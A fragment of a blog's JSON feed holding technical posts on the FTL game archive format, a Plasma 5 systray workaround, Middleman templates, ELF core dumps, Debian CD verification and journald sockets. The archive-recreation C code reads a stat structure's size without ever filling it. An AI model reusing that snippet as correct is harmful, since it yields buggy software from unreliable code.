  3. \n

    32-bit little-endian offsets of each file structure within the archive\n (zeros are ignored);

    \n
  4. \n
  5. \n

    At each non-zero offset, a file is described by:

    \n
  6. \n
\n

a. file data size (32-bit little endian);

\n

b. file name size (32-bit little endian);

\n

c. file name;

\n

d. file data.

\n

In pseudo-C, the archive starts with a header:

\n
struct ftl_data_header {\n  uint32_t slots_count; // Little-endian\n  uint32_t file_offsets[slots_count]; // Little-endian offsets for struct ftl_file\n};\n
\n\n\n

Extracting the files

\n

We can extract the archive with this code (simplified version excluding error\nhandling and endianness issues for exposition):

\n
FILE* file = fopen(\"data.dat\", \"rb\");\n\nuint32_t slots_count;\nfread(&slots_count, sizeof(slots_count), 1, file);\n\nuint32_t* slots = malloc(slots_count * sizeof(uint32_t));\nfread(slots, sizeof(uint32_t), slots_count, file);\n\nfor (uint32_t i = 0; i != slots_count; ++i) {\n\n  uint32_t offset = slots[i];\n  if (offset == 0)\n    continue;\n  fseek(file, offset, SEEK_SET);\n\n  uint32_t data_size;\n  fread(&data_size, sizeof(data_size), 1, file);\n\n  uint32_t name_size;\n  fread(&name_size, sizeof(name_size), 1, file);\n\n  char* name = malloc(name_size + 1);\n  fread(name, 1, name_size, file);\n  name[name_size] = '\\0';\n\n  void* data = malloc(data_size);\n  fread(data, 1, data_size, file);\n\n  create_directory_for(name);\n  FILE* output = fopen(name, \"wb\");\n  fwrite(data, 1, data_size, output);\n\n  fclose(output);\n  free(data);\n  free(name);\n}\nfree(slots);\nfclose(file);\n
\n\n\n

Extracting resources.dat

\n

The same format is used for resources.dat and we can extract the\nassets (images, sounds, music, etc.) with the same program:

\n
\naudio/music/bp_MUS_RockmenBATTLE.ogg\naudio/music/bp_MUS_DebrisEXPLORE.ogg\n[...]\naudio/waves/ui/select_down2.wav\naudio/waves/ui/bp_SFX_NewShipUnlocked.ogg\n[...]\nimg/pause_large_on.png\nimg/pause_teleport_leave.png\n[...]\n
\n\n

Recreating the archive

\n

The archive can be recreated with this code (again excluding error handling\nand endianness):

\n
FILE* output = fopen(archive_name, \"wb\");\n\nuint32_t slots_count = 0xc68;\nif (file_count > slots_count)\n  slots_count = file_count;\nuint32_t temp_slot_count = htole32(slots_count);\nfwrite(&temp_slot_count, sizeof(uint32_t), 1, output);\n\nuint32_t* slots = calloc(slots_count, sizeof(uint32_t));\nfwrite(slots, sizeof(uint32_t), slots_count, output);\n\nfor (int i = 0; i != file_count; ++i) {\n\n  const char* file_name = files[i];\n  long offset = ftell(output);\n  slots[i] = htole32(offset);\n  FILE* file = fopen(file_name, \"rb\");\n\n  int fd = fileno(file);\n  struct stat file_stat;\n  uint32_t data_size =file_stat.st_size;\n  uint32_t temp_data_size = htole32(data_size);\n  fwrite(&temp_data_size, sizeof(uint32_t), 1, output);\n\n  uint32_t name_size = strlen(file_name);\n  uint32_t temp_name_size = htole32(name_size);\n  fwrite(&temp_name_size, sizeof(uint32_t), 1, output);\n  fwrite(file_name, sizeof(char), name_size, output);\n\n  char* data = malloc(data_size);\n  fread(data, sizeof(char), data_size, file);\n  fwrite(data, sizeof(char), data_size, output);\n\n  free(data);\n  fclose(file);\n}\n\nfseek(output, sizeof(uint32_t), SEEK_SET);\nfwrite(slots, sizeof(uint32_t), slots_count, output);\n\nfree(slots);\nfclose(output);\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/07/29/i-can-has-systray/", "title": "I can has systray?", "url": "https://www.gabriel.urdhr.fr/2015/07/29/i-can-has-systray/", "date_published": "2015-07-29T00:00:00+02:00", "date_modified": "2015-07-29T00:00:00+02:00", "tags": ["computer", "gui", "kde"], "content_html": "

In Plasma 5, support for the XEmbed-based\n\u201clegacy\u201d systray protocol\nwas removed:\nonly the new SNI protocol is handled.\nHowever, in the real worl a lot of applications do not handle the new protocol:\nQt4 and Qt5 applications can be fixed\nby installing the sni-qt (currently in experimental) and libdbusmenu-qt5 respectively\nbut other applications (such as GTK ones) must be patched/recompiled with SNI support.\nWithout this, windows disappear into oblivion \"\ud83d\ude3f\".\nYou can have a seamless systray-enabled Plasma panel\nwith a single (OK, two) line of shell \"\ud83d\ude3c\".

\n

Implementation

\n

First, resize your panel and remove some space on the right\n(this is where we're going to add a new panel):

\n

\"\"

\n

Then install trayer and run:

\n
trayer --align right --widthtype pixel --width 150 --transparent false \\\n  --heighttype pixel --height 30 --alpha 230 --padding 10\n
\n\n\n

Now, you have systrays in your panel: \"\ud83d\ude38\"

\n

\"\"

\n

You might need to adjust the parameters of trayer and resize the panel in\norder to have a seamless panel.

\n

Installation

\n

You can then add a script to do this (mine is in ~/.bin/icanhazsystray):

\n
#!/bin/sh\nexec trayer --align right --widthtype pixel --width 150 --transparent false \\\n  --heighttype pixel --height 30 --alpha 230 --padding 10\n
\n\n\n

Now, you can ask Plasma to run this script when starting the session.

\n

The new Plasma 5 is quite nice by the way (but the lack of classic\nsystray is not so nice).

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/07/04/html-pipeline-middleman/", "title": "Use HTML pipeline in Middleman", "url": "https://www.gabriel.urdhr.fr/2015/07/04/html-pipeline-middleman/", "date_published": "2015-07-04T00:00:00+02:00", "date_modified": "2015-07-04T00:00:00+02:00", "tags": ["computer", "middleman", "ruby", "html", "tilt", "rack", "emoji", "markdown", "web"], "content_html": "

How to use html-pipeline in\nmiddleman.

\n

Why

\n

The idea is to be able add postprocessing steps after the markdown processing.\nThe same idea can be used to wrap a default tilt template with any kind of\npostprocessing operations.

\n

How

\n

We need those gems (Gemfile):

\n
gem 'html-pipeline'\ngem 'github-linguist'\ngem 'github-markdown'\n# Ships with non-free emojis but you can use free ones:\ngem 'gemoji'\n
\n\n\n

Define a tilt template based on a given\nhtml-pipeline (lib/mytemplate.rb) generating HTML from markdown:

\n
require 'tilt/template'\n\nclass MarkdownHtmlFilterTemplate < Tilt::Template\n  self.default_mime_type = \"text/html\"\n\n  def self.engine_initialized?\n    defined? ::Pygments and defined? ::Html::Pipeline and defined? ::Linguist\n  end\n\n  def initialize_engine\n    require 'html/pipeline'\n    require 'linguist'\n    require \"pygments\"\n  end\n\n  def prepare\n    @engine = HTML::Pipeline.new [\n      HTML::Pipeline::MarkdownFilter,\n      HTML::Pipeline::EmojiFilter,\n      HTML::Pipeline::SyntaxHighlightFilter,\n      HTML::Pipeline::TableOfContentsFilter\n    ], :asset_root => \"/\", :gfm => false\n  end\n\n  def evaluate(scope, locals, &block)\n    @output ||= @engine.call(data)[:output].to_s\n  end\n\nend\n
\n\n\n

Use it in middleman (config.rb) for processing markdown files:

\n
require 'lib/mytemplates'\n# We need to omit the Template suffix:\nset :markdown_engine, :MarkdownHtmlFilter\n
\n\n\n

Alternative: rack filter

\n

Another solution is to use rack filter:

\n
module Rack\n  class MyEmojiFilter\n\n    def initialize(app, options = {})\n      @app = app\n      @options = options\n    end\n\n    def call(env)\n      status, headers, response = @app.call(env)\n      if headers[\"Content-Type\"] and headers[\"Content-Type\"].include? \"text/html\"\n        html = \"\"\n        response.each { |chunk| html << chunk }\n        html = process(html)\n        headers['Content-Type'] = \"text/html; charset=utf-8\"\n        headers['Content-Length'] = \"\".respond_to?(:bytesize) ? html.bytesize.to_s : html.size.to_s\n        [status, headers, [html]]\n      else\n        [status, headers, response]\n      end\n    end\n\n    def process(html)\n      html.gsub(/:([a-zA-Z0-9_]{1,}):/) do |match|\n        emoji = $1\n        \"<img class='emoji' src='/img/emoji/#{emoji}.png' alt=':#{emoji}:' />\"\n      end\n    end\n\n  end\nend\n
\n\n\n

The difference is that this processes all the files and the whole content of\nthem.

\n

Alternative: extending the basic template by composition

\n
class MarkdownTemplate < Tilt::Template\n  self.default_mime_type = \"text/html\"\n  def self.engine_initialized?\n    defined? ::Tilt::KramdownTemplate\n  end\n  def initialize_engine\n    require 'tilt/markdown'\n  end\n  def prepare\n    @template = Tilt::KramdownTemplate.new(@file, @line, @options, &@reader)\n  end\n  def replace_emoji\n    text.gsub(/:([a-zA-Z0-9_]{1,}):/) do |match|\n      \"<img class='emoji' src='/img/emoji/#{$1}.png' alt=':#{$1}:' />\"\n    end\n  end\n  def evaluate(scope, locals, &block)\n   @output ||= replace_emoji(@template.render(scope, locals, &block))\n  end\nend\n
\n\n\n

Alternative: extending the processor

\n

This monkey-patches the Kramdown parser in order to recognise emojis:

\n
require 'kramdown/parser/kramdown.rb'\n\nmodule Kramdown\n  module Parser\n    class Kramdown\n      alias_method :old_emoji_initialize, :initialize\n      def initialize(source, options)\n        old_emoji_initialize source, options\n        @span_parsers.unshift(:emoji)\n      end\n      def parse_emoji\n        start_line_number = @src.current_line_number\n        @src.pos += @src.matched_size\n        emoji = @src[1]\n        el = Element.new(:img, nil, nil, :location => start_line_number)\n        add_link(el, \"/img/emoji/#{emoji}.png\", nil, \":#{emoji}:\")\n      end\n      EMOJI_MATCH = /:([0-9a-zA-Z_]{1,}):/\n      define_parser(:emoji, EMOJI_MATCH)\n    end\n  end\nend\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/05/29/core-file/", "title": "Anatomy of an ELF core file", "url": "https://www.gabriel.urdhr.fr/2015/05/29/core-file/", "date_published": "2015-05-29T00:00:00+02:00", "date_modified": "2015-05-29T00:00:00+02:00", "tags": ["computer", "system", "elf", "coredump"], "content_html": "

The ELF format is used for\ncompilation outputs (.o files), executables, shared libraries and core dumps.\nThe first cases are documented in the System V ABI\nspecification\nand the TIS ELF\nspecification but there does not\nseem to be much documentation about the usage of the ELF format for core dumps.\nHere are some notes on this.

\n

Let's create a core dump and look at it:

\n
pid=$(pgrep xchat)\ngcore $pid\nreadelf -a core.$pid\n
\n\n\n

ELF header

\n

Nothing special except in the ELF header. The e_type=ET_CORE marks\nthe file as a core file:

\n
\nELF Header:\n  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00\n  Class:                             ELF64\n  Data:                              2's complement, little endian\n  Version:                           1 (current)\n  OS/ABI:                            UNIX - System V\n  ABI Version:                       0\n  Type:                              CORE (Core file)\n  Machine:                           Advanced Micro Devices X86-64\n  Version:                           0x1\n  Entry point address:               0x0\n  Start of program headers:          64 (bytes into file)\n  Start of section headers:          57666560 (bytes into file)\n  Flags:                             0x0\n  Size of this header:               64 (bytes)\n  Size of program headers:           56 (bytes)\n  Number of program headers:         344\n  Size of section headers:           64 (bytes)\n  Number of section headers:         346\n  Section header string table index: 345\n
\n\n

Program headers

\n
\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  NOTE           0x0000000000004b80 0x0000000000000000 0x0000000000000000\n                 0x0000000000009064 0x0000000000000000  R      1\n  LOAD           0x000000000000dbe4 0x0000000000400000 0x0000000000000000\n                 0x0000000000000000 0x000000000009d000  R E    1\n  LOAD           0x000000000000dbe4 0x000000000069c000 0x0000000000000000\n                 0x0000000000004000 0x0000000000004000  RW     1\n  LOAD           0x0000000000011be4 0x00000000006a0000 0x0000000000000000\n                 0x0000000000004000 0x0000000000004000  RW     1\n  LOAD           0x0000000000015be4 0x0000000001872000 0x0000000000000000\n                 0x0000000000ed4000 0x0000000000ed4000  RW     1\n  LOAD           0x0000000000ee9be4 0x00007f248c000000 0x0000000000000000\n                 0x0000000000021000 0x0000000000021000  RW     1\n  LOAD           0x0000000000f0abe4 0x00007f2490885000 0x0000000000000000\n                 0x000000000001c000 0x000000000001c000  R      1\n  LOAD           0x0000000000f26be4 0x00007f24908a1000 0x0000000000000000\n                 0x000000000001c000 0x000000000001c000  R      1\n  LOAD           0x0000000000f42be4 0x00007f24908bd000 0x0000000000000000\n                 0x00000000005f3000 0x00000000005f3000  R      1\n  LOAD           0x0000000001535be4 0x00007f2490eb0000 0x0000000000000000\n                 0x0000000000000000 0x0000000000002000  R E    1\n  LOAD           0x0000000001535be4 0x00007f24910b1000 0x0000000000000000\n                 0x0000000000001000 0x0000000000001000  R      1\n  LOAD           0x0000000001536be4 0x00007f24910b2000 0x0000000000000000\n                 0x0000000000001000 0x0000000000001000  RW     1\n  LOAD           0x0000000001537be4 0x00007f24910b3000 0x0000000000000000\n                 0x0000000000060000 0x0000000000060000  RW     1\n  LOAD           0x0000000001597be4 0x00007f2491114000 0x0000000000000000\n                 0x0000000000800000 0x0000000000800000  RW     1\n  LOAD           0x0000000001d97be4 0x00007f2491914000 0x0000000000000000\n                 0x0000000000000000 0x00000000001a8000  R E    1\n  LOAD           0x0000000001d97be4 0x00007f2491cbc000 0x0000000000000000\n                 0x000000000000e000 0x000000000000e000  R      1\n  LOAD           0x0000000001da5be4 0x00007f2491cca000 0x0000000000000000\n                 0x0000000000003000 0x0000000000003000  RW     1\n  LOAD           0x0000000001da8be4 0x00007f2491ccd000 0x0000000000000000\n                 0x0000000000001000 0x0000000000001000  RW     1\n  LOAD           0x0000000001da9be4 0x00007f2491cd1000 0x0000000000000000\n                 0x0000000000008000 0x0000000000008000  R      1\n  LOAD           0x0000000001db1be4 0x00007f2491cd9000 0x0000000000000000\n                 0x000000000001c000 0x000000000001c000  R      1\n[...]\n
\n\n

The PT_LOAD entry in the program header describes VMAs of the process:

\n\n

As these are VMAs, they are aligned on page boundaries.

\n

We can compare that with cat /proc/$pid/maps and we find the same\ninformation:

\n
\n00400000-0049d000 r-xp 00000000 08:11 789936          /usr/bin/xchat\n0069c000-006a0000 rw-p 0009c000 08:11 789936          /usr/bin/xchat\n006a0000-006a4000 rw-p 00000000 00:00 0\n01872000-02746000 rw-p 00000000 00:00 0               [heap]\n7f248c000000-7f248c021000 rw-p 00000000 00:00 0\n7f248c021000-7f2490000000 ---p 00000000 00:00 0\n7f2490885000-7f24908a1000 r--p 00000000 08:11 1442232 /usr/share/icons/gnome/icon-theme.cache\n7f24908a1000-7f24908bd000 r--p 00000000 08:11 1442232 /usr/share/icons/gnome/icon-theme.cache\n7f24908bd000-7f2490eb0000 r--p 00000000 08:11 1313585 /usr/share/fonts/opentype/ipafont-gothic/ipag.ttf\n7f2490eb0000-7f2490eb2000 r-xp 00000000 08:11 1195904 /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n7f2490eb2000-7f24910b1000 ---p 00002000 08:11 1195904 /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n7f24910b1000-7f24910b2000 r--p 00001000 08:11 1195904 /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n7f24910b2000-7f24910b3000 rw-p 00002000 08:11 1195904 /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n7f24910b3000-7f2491113000 rw-s 00000000 00:04 1409039 /SYSV00000000 (deleted)\n7f2491113000-7f2491114000 ---p 00000000 00:00 0\n7f2491114000-7f2491914000 rw-p 00000000 00:00 0      [stack:1957]\n[...]\n
\n\n

The three first PT_LOAD entries of the core dump map to the VMAs of\nthe xchat ELF file:

\n\n

We can compare this to the program headers of the xchat program:

\n
\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001c0 0x00000000000001c0  R E    8\n  INTERP         0x0000000000000200 0x0000000000400200 0x0000000000400200\n                 0x000000000000001c 0x000000000000001c  R      1\n      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x000000000009c4b4 0x000000000009c4b4  R E    200000\n  LOAD           0x000000000009c4b8 0x000000000069c4b8 0x000000000069c4b8\n                 0x0000000000002bc9 0x0000000000007920  RW     200000\n  DYNAMIC        0x000000000009c4d0 0x000000000069c4d0 0x000000000069c4d0\n                 0x0000000000000360 0x0000000000000360  RW     8\n  NOTE           0x000000000000021c 0x000000000040021c 0x000000000040021c\n                 0x0000000000000044 0x0000000000000044  R      4\n  GNU_EH_FRAME   0x0000000000086518 0x0000000000486518 0x0000000000486518\n                 0x0000000000002e64 0x0000000000002e64  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n\n Section to Segment mapping:\n  Segment Sections...\n   00\n   01     .interp\n   02     .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_d .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame\n   03     .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss\n   04     .dynamic\n   05     .note.ABI-tag .note.gnu.build-id\n   06     .eh_frame_hdr\n   07\n
\n\n

Sections

\n

ELF core dump are not expected to have section headers. The Linux\nkernel does not generate sections headers when it generates core\ndumps. GDB generates section headers with the same information as the\nprogram headers:

\n\n
\nSection Headers:\n  [Nr] Name              Type             Address           Offset\n       Size              EntSize          Flags  Link  Info  Align\n  [ 0]                   NULL             0000000000000000  00000000\n       0000000000000000  0000000000000000           0     0     0\n  [ 1] note0             NOTE             0000000000000000  00004b80\n       0000000000009064  0000000000000000   A       0     0     1\n  [ 2] load              NOBITS           0000000000400000  0000dbe4\n       000000000009d000  0000000000000000  AX       0     0     1\n  [ 3] load              PROGBITS         000000000069c000  0000dbe4\n       0000000000004000  0000000000000000  WA       0     0     1\n  [ 4] load              PROGBITS         00000000006a0000  00011be4\n       0000000000004000  0000000000000000  WA       0     0     1\n  [ 5] load              PROGBITS         0000000001872000  00015be4\n       0000000000ed4000  0000000000000000  WA       0     0     1\n  [ 6] load              PROGBITS         00007f248c000000  00ee9be4\n       0000000000021000  0000000000000000  WA       0     0     1\n  [ 7] load              PROGBITS         00007f2490885000  00f0abe4\n       000000000001c000  0000000000000000   A       0     0     1\n  [ 8] load              PROGBITS         00007f24908a1000  00f26be4\n       000000000001c000  0000000000000000   A       0     0     1\n  [ 9] load              PROGBITS         00007f24908bd000  00f42be4\n       00000000005f3000  0000000000000000   A       0     0     1\n  [10] load              NOBITS           00007f2490eb0000  01535be4\n       0000000000002000  0000000000000000  AX       0     0     1\n  [11] load              PROGBITS         00007f24910b1000  01535be4\n       0000000000001000  0000000000000000   A       0     0     1\n  [12] load              PROGBITS         00007f24910b2000  01536be4\n       0000000000001000  0000000000000000  WA       0     0     1\n  [13] load              PROGBITS         00007f24910b3000  01537be4\n       0000000000060000  0000000000000000  WA       0     0     1\n[...]\n  [345] .shstrtab         STRTAB           0000000000000000  036febe4\n       0000000000000016  0000000000000000           0     0     1\nKey to Flags:\n  W (write), A (alloc), X (execute), M (merge), S (strings), l (large)\n  I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)\n  O (extra OS processing required) o (OS specific), p (processor specific\n
\n\n

Notes

\n

The PT_NOTE program header contains additional information such as\nthe registers of the threads, the files associated with each VMA, etc.\nIt is made of\nentries of\n(ElfW(Nhdr) structure):

\n\n

Here is the content of the notes:

\n
Displaying notes found at file offset 0x00004b80 with length 0x00009064:\n  Owner                 Data size       Description\n  CORE                 0x00000088       NT_PRPSINFO (prpsinfo structure)\n\n  CORE                 0x00000150       NT_PRSTATUS (prstatus structure)\n  CORE                 0x00000200       NT_FPREGSET (floating point registers)\n  LINUX                0x00000440       NT_X86_XSTATE (x86 XSAVE extended state)\n  CORE                 0x00000080       NT_SIGINFO (siginfo_t data)\n\n  CORE                 0x00000150       NT_PRSTATUS (prstatus structure)\n  CORE                 0x00000200       NT_FPREGSET (floating point registers)\n  LINUX                0x00000440       NT_X86_XSTATE (x86 XSAVE extended state)\n  CORE                 0x00000080       NT_SIGINFO (siginfo_t data)\n\n  CORE                 0x00000150       NT_PRSTATUS (prstatus structure)\n  CORE                 0x00000200       NT_FPREGSET (floating point registers)\n  LINUX                0x00000440       NT_X86_XSTATE (x86 XSAVE extended state)\n  CORE                 0x00000080       NT_SIGINFO (siginfo_t data)\n\n  CORE                 0x00000150       NT_PRSTATUS (prstatus structure)\n  CORE                 0x00000200       NT_FPREGSET (floating point registers)\n  LINUX                0x00000440       NT_X86_XSTATE (x86 XSAVE extended state)\n  CORE                 0x00000080       NT_SIGINFO (siginfo_t data)\n\n  CORE                 0x00000130       NT_AUXV (auxiliary vector)\n  CORE                 0x00006cee       NT_FILE (mapped files)\n
\n\n

Most data structures (prpsinfo, prstatus, etc.) are defined in C\nheader files (such as linux/elfcore.h).

\n

Generic process informations

\n

The CORE/NT_PRPSINFO entry defines generic process informations such\nas the process state, UIG, GID, filename and (part of) its arguments.

\n

The CORE/NT_AUXV entry describes the auxiliary vector.

\n

Thread information

\n

Each thread has the following entries:

\n\n

For multithread processes there are two approaches:

\n\n

See the wording of LLDB source\ncode:

\n
\n

If a core file contains multiple thread contexts then there is two data forms

\n
    \n
  1. \n

    Each thread context(2 or more NOTE entries) contained in its own segment (PT_NOTE)

    \n
  2. \n
  3. \n

    All thread context is stored in a single segment(PT_NOTE).\n This case is little tricker since while parsing we have to find where the\n new thread starts. The current implementation marks beginning of\n new thread when it finds NT_PRSTATUS or NT_PRPSINFO NOTE entry.

    \n
  4. \n
\n
\n

File association

\n

The CORE/NT_FILE entry describes the association between VMAs and\nfiles. Each non-anonymous VMA has an entry with:

\n\n
\n    Page size: 1\n                 Start                 End         Page Offset\n    0x0000000000400000  0x000000000049d000  0x0000000000000000\n        /usr/bin/xchat\n    0x000000000069c000  0x00000000006a0000  0x000000000009c000\n        /usr/bin/xchat\n    0x00007f2490885000  0x00007f24908a1000  0x0000000000000000\n        /usr/share/icons/gnome/icon-theme.cache\n    0x00007f24908a1000  0x00007f24908bd000  0x0000000000000000\n        /usr/share/icons/gnome/icon-theme.cache\n    0x00007f24908bd000  0x00007f2490eb0000  0x0000000000000000\n        /usr/share/fonts/opentype/ipafont-gothic/ipag.ttf\n    0x00007f2490eb0000  0x00007f2490eb2000  0x0000000000000000\n        /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n    0x00007f2490eb2000  0x00007f24910b1000  0x0000000000002000\n        /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n    0x00007f24910b1000  0x00007f24910b2000  0x0000000000001000\n        /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n    0x00007f24910b2000  0x00007f24910b3000  0x0000000000002000\n        /usr/lib/x86_64-linux-gnu/gconv/CP1252.so\n    0x00007f24910b3000  0x00007f2491113000  0x0000000000000000\n        /SYSV00000000 (deleted)\n    0x00007f2491914000  0x00007f2491abc000  0x0000000000000000\n        /usr/lib/x86_64-linux-gnu/libtcl8.6.so\n    0x00007f2491abc000  0x00007f2491cbc000  0x00000000001a8000\n        /usr/lib/x86_64-linux-gnu/libtcl8.6.so\n    0x00007f2491cbc000  0x00007f2491cca000  0x00000000001a8000\n        /usr/lib/x86_64-linux-gnu/libtcl8.6.so\n    0x00007f2491cca000  0x00007f2491ccd000  0x00000000001b6000\n        /usr/lib/x86_64-linux-gnu/libtcl8.6.so\n    0x00007f2491cd1000  0x00007f2491cd9000  0x0000000000000000\n        /usr/share/icons/hicolor/icon-theme.cache\n    0x00007f2491cd9000  0x00007f2491cf5000  0x0000000000000000\n        /usr/share/icons/oxygen/icon-theme.cache\n    0x00007f2491cf5000  0x00007f2491d11000  0x0000000000000000\n        /usr/share/icons/oxygen/icon-theme.cache\n    0x00007f2491d11000  0x00007f2491d1d000  0x0000000000000000\n        /usr/lib/xchat/plugins/tcl.so\n[...]\n
\n\n

As far as I understand (from the binutils readelf source code)\nthe format of the CORE/NT_FILE entry is:

\n
    \n
  1. number of map entries (32 or 64 bits);
  2. \n
  3. page size (set to 1 by GDB instead of the real page size, 32 ou 64 bits);
  4. \n
  5. each map entry with the format:
      \n
    1. start
    2. \n
    3. end;
    4. \n
    5. file offset
    6. \n
    \n
  6. \n
  7. each (null terminated) path string in order.
  8. \n
\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/05/10/verify-a-debian-cd/", "title": "Verifying authenticity of Debian CDs", "url": "https://www.gabriel.urdhr.fr/2015/05/10/verify-a-debian-cd/", "date_published": "2015-05-10T00:00:00+02:00", "date_modified": "2015-05-10T00:00:00+02:00", "tags": ["computer", "debian"], "content_html": "

The official guide for verifying\nthe authenticity of a Debian \"\ud83c\udf65\" CD image is not so clear if you don't\nalready have an idea about what you're doing. Here is a translation in\nterms of shell commands.

\n

You need to download:

\n\n

Then you need to:

\n
cat SHA512SUMS | grep debian-8.0.0-amd64-xfce-CD-1.iso | sha512sum -c - # (1)\nsudo apt-get install debian-keyring  # (2)\ngpgv --keyring /usr/share/keyrings/debian-role-keys.gpg -vv -- \\\n  SHA512SUMS.sign SHA512SUMS # (3)\n
\n\n\n

and check that it does not spit any error.

\n

Details:

\n
    \n
  1. \n

    This check that the downloaded file matches the digest as\n indicated in the SHA12SUM file:

    \n

    $ cat SHA512SUMS | grep debian-8.0.0-amd64-xfce-CD-1.iso | sha512sum -c -\ndebian-8.0.0-amd64-xfce-CD-1.iso: OK\n
    \n

    You should not use the MD5SUMS because MD5 is broken and avoid\nSHA1SUMS as\nwell.

    \n

    Warning: This is not enough to conclude that the CD image\nis the correct one because an attacker could have uploaded a\nmalicious CD image and a corresponding digest file: we need to\ncheck that the SHA512SUMS has been issued by Debian.

    \n
  2. \n
  3. \n

    We first need to get the GPG public keys of Debian.

    \n
  4. \n
  5. \n

    Then we need to verify the signature of the SHA512SUMS file:

    \n

    \n$ gpgv --keyring /usr/share/keyrings/debian-role-keys.gpg -vv -- \\\n  SHA512SUMS.sign SHA512SUMS\ngpgv: armor: BEGIN PGP SIGNATURE\ngpgv: armor header: Version: GnuPG v1.4.12 (GNU/Linux)\n:signature packet: algo 1, keyid DA87E80D6294BE9B\n        version 4, created 1430005434, md5len 0, sigclass 0x00\n        digest algo 8, begin of digest 87 47\n        hashed subpkt 2 len 4 (sig created 2015-04-25)\n        subpkt 16 len 8 (issuer key ID DA87E80D6294BE9B)\n        data: [4095 bits]\ngpgv: Signature made Sun Apr 26 01:43:54 2015 CEST using RSA key ID 6294BE9B\ngpgv: Good signature from \"Debian CD signing key debian-cd@lists.debian.org\"\ngpgv: binary signature, digest algorithm SHA256\n
    \n

    You might want to check that the digest algorithm is not a broken\nhash function (not MD5, not SHA-1) but something such as SHA-256\nor SHA-512. You might want to check the identity of the signed\n(Debian CD signing key <debian-cd@lists.debian.org>) as well.

    \n
  6. \n
\n

Warning: Both steps (verifying the digest, verifying the\nsignature of the digest file) are necessary in order to ensure that\nthe file is an authentic Debian CD image.

\n

In Fedora, the Debian keyring is shipped in the\ndebian-keyring\npackage.

"}, {"id": "http://www.gabriel.urdhr.fr/2015/04/29/journald-workflow/", "title": "Logging message workflow with journald", "url": "https://www.gabriel.urdhr.fr/2015/04/29/journald-workflow/", "date_published": "2015-04-29T00:00:00+02:00", "date_modified": "2015-04-29T00:00:00+02:00", "tags": ["computer", "system", "log", "syslog", "systemd", "journald"], "content_html": "

A short summary of the logging message workflow with\nsystemd-journald\n(and the different formats and sockets involved).

\n

Summary

\n
\n       /run/systemd/journal/dev-log\n       a.k.a. /dev/log (syslog format)\n      .--------------->------------------.\n      |                                  |\n      |                                  |\n      |      /run/systemd/journal/socket v\n.-----------.(native format)            .----------.  .--------------------.\n| processes |---------------------------| journald |->| /var/log/journal/* |\n'-----------'                           '----------'  '--------------------'\n      |  /run/systemd/journal/stdout    ^ ^  |^ |\n      |  (stream format)                | |  || |/run/systemd/journal/syslog\n      '--------------->-----------------' |  || |(syslog format)\n                                          |  || |\n .--------.  /dev/kmsg (kmsg format)      |  || |  .---------.  .------------.\n | kernel |-------------------------------'  || '->| rsyslog |->| /var/log/* |\n '--------'                                  ||    '---------'  '------------'\n                             (Journal Export ||       | ^\n                             Format)         v|       v |(syslog format)\n                               .-----------------.  .----------------------.\n                               | Remote journald |  | Remote syslog daemon |\n                               '-----------------'  '----------------------'\n
\n\n

Inputs

\n

Kernel messages

\n

/dev/kmsg is a device used to receive logging messages from the\nLinux\nkernel\nusing a specific (kmsg) format.

\n

Syslog format input

\n

/run/systemd/journal/dev-log is a SOCK_DGRAM socket which can be\nused by processes to send syslog-compatible messages to journald. It\nis symlinked in /dev/log which means that all processes trying to\nuse the system syslog will in fact send their messages to journald.

\n

It is used:

\n\n

Stream format input

\n

/run/systemd/journal/stdout is a SOCK_STREAM socket which can be used by\nprocesses to send logging messages in the simple \u201cstream\u201d format (one\nline per message with an optional severity prefix).

\n

Usage:

\n\n

Just after opening, the file sd_journal_stream_fd() send the\nfollowing information:

\n
    \n
  1. \n

    the self-proclaimed name of the program (optional);

    \n
  2. \n
  3. \n

    unit name (optional);

    \n
  4. \n
  5. \n

    default severity (when no prefix severity is used);

    \n
  6. \n
  7. \n

    whether to parse severity prefixes in the messages;

    \n
  8. \n
  9. \n

    whether to forward messages to /run/systemd/journal/syslog (0 or\n1);

    \n
  10. \n
\n

This happen as well if ForwardToSyslog=true in the systemd\n configuration (enabled by default).

\n
    \n
  1. whether to forward messages to /dev/kmsg (0 or 1);
  2. \n
\n

This happen as well if ForwardToKMsg=true in the systemd\n configuration (disabled by default). with the MaxLevelKMsg option.

\n
    \n
  1. whether to forward messages to console (0 or 1).
  2. \n
\n

This happen as well if ForwardToConsole=true in the systemd\n configuration (disabled by default).

\n

Each line after this prolog is a logging message optionally prefixed\nwith a severity.

\n

Example:

\n
foo\nfoo.service\n5\n1\n0\n0\n0\n<7>Debug 1\n<7>Debug 2\n
\n\n\n

We can create log entries with:

\n
echo \"foo\nfoo.service\n5\n1\n0\n0\n0\n<7>Debug 1\n<7>Debug 2\" | socat STDIN UNIX-CONNECT:/run/systemd/journal/stdout\n
\n\n\n

Native format input

\n

/run/systemd/journal/socket is a SOCK_DGRAM socket used for\nlogging data to syslog using the native format. AFAIK, this is the\nsame format as Journal Export\nFormat but\nwith one logging message per datagram:

\n
PRIORITY=7\nMESSAGE=First (debug) message\nSYSLOG_IDENTIFIER=foo\n
\n\n\n

